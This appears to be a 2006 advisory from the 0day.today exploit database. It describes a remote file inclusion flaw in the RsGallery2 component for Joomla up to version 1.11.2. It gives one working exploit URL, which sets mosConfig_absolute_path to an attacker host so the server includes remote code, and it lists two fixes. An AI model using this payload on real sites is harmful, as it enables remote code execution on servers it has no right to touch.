[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

RsGallery2 <= 1.11.2 (rsgallery.html.php) File Include Vulnerability

Author
marriottvn
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-552
Category
web applications
Date add
27-06-2006
Platform
unsorted
====================================================================
RsGallery2 <= 1.11.2 (rsgallery.html.php) File Include Vulnerability
====================================================================



RsGallery2 for Joomla
---------------------------------------------------------------------------

Discovered: marriottvn
Remote : Yes
Level : High

---------------------------------------------------------------------------
Affected software description :

Application : RsGallery2
version : latest version [ 1.11.2 ]
Description: component for joomla
URL: http://rsdev.nl

----------------------------------------------------------------------------

Vulnerable file :

rsgallery2.html.php

----------------------------------------------------------------------------

Exploit:

http://[sitepath]/[joomlapath]/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://[attacker]

----------------------------------------------------------------------------

Fix:

1.Declare variabel $mosConfig_absolute_path

or

2.Add into the top function:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

----------------------------------------------------------------------------





#  0day.today [2024-11-16]  #